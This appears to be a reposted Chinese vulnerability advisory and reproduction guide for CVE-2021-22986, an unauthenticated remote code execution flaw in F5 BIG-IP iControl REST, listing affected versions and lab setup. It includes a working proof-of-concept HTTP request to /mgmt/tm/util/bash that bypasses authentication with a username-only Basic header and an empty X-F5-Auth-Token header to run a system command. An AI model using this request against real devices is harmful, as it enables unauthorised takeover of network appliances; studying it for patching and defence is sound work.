记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

F5 BIG-IP iControl 未授权远程代码执行漏洞

2021-03-20 01:15

0x01  漏洞介绍



      F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。BIG-IP提供了应用程序加速、负载均衡、速率调整、SSL卸载和Web应用程序防护功能。该产品已被许多公司使用,F5声称全球50强公司中有48家是其客户。 

      近日,F5发布了多个高危漏洞通告,其中CVE-2021-22986是严重级别的未授权远程代码执行。该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。


0x02  漏洞编号



CVE-2021-22986


0x03  漏洞等级



CVSS:CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

漏洞等级:9.8 | 严重


0x04 漏洞影响范围


16.0.0 <= BIG-IP <= 16.0.1 

15.1.0 <= BIG-IP <= 15.1.2 

14.1.0 <= BIG-IP <= 14.1.3.1 

13.1.0 <= BIG-IP <= 13.1.3.5 

12.1.0 <= BIG-IP <= 12.1.5.2 

7.1.0 <= BIG-IQ <= 7.1.0.2 

7.0.0 <= BIG-IQ <= 7.0.0.1 

6.0.0 <= BIG-IQ <= 6.1.0


0x05 漏洞POC



参考地址:

https://blog.riskivy.com/f5%e4%bb%8e%e8%ae%a4%e8%af%81%e7%bb%95%e8%bf%87%e5%88%b0%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/


0x06 漏洞复现过程



环境下载:

访问官方地址:

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

下载BIGIP 14.1.2版本。

BIGIP提供多版本下载,其中包括各种部署完成的虚拟机以及ISO系统镜像。

下载完成后,直接导入到vmware中打开,默认root密码为default,初次登录需要修改密码。登录到系统后输入命令config开始部署网络。

部署完成后,即可使用https协议访问该系统。

然后使用用户名admin,初始密码为修改后的root密码即可登录,初次登录后需要修改admin密码。

修改完成后,使用新密码登录系统,完成系统初步部署。

至此,漏洞环境部署完毕。


漏洞复现:

POC:

POST /mgmt/tm/util/bash HTTP/1.1Host: 10.*.*.*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 42Content-Type: application/json
{"command": "run", "utilCmdArgs": "-c id"}

这里需要注意的是,Authorization中的Basic认证只需要用户名即可,默认admin,即YWRtaW46的base64解码明文为"admin:"。此外,header中X-F5-Auth-Token: 不可缺少

验证结果:


知识来源: https://mp.weixin.qq.com/s?__biz=MzUxMjc0MTE3Mw==&mid=2247486207&idx=1&sn=62445d4b28875351644e676b8667c10a

阅读:117517 | 评论:0 | 标签:漏洞 远程 执行

想收藏或者和大家分享这篇好文章→复制链接地址

“F5 BIG-IP iControl 未授权远程代码执行漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁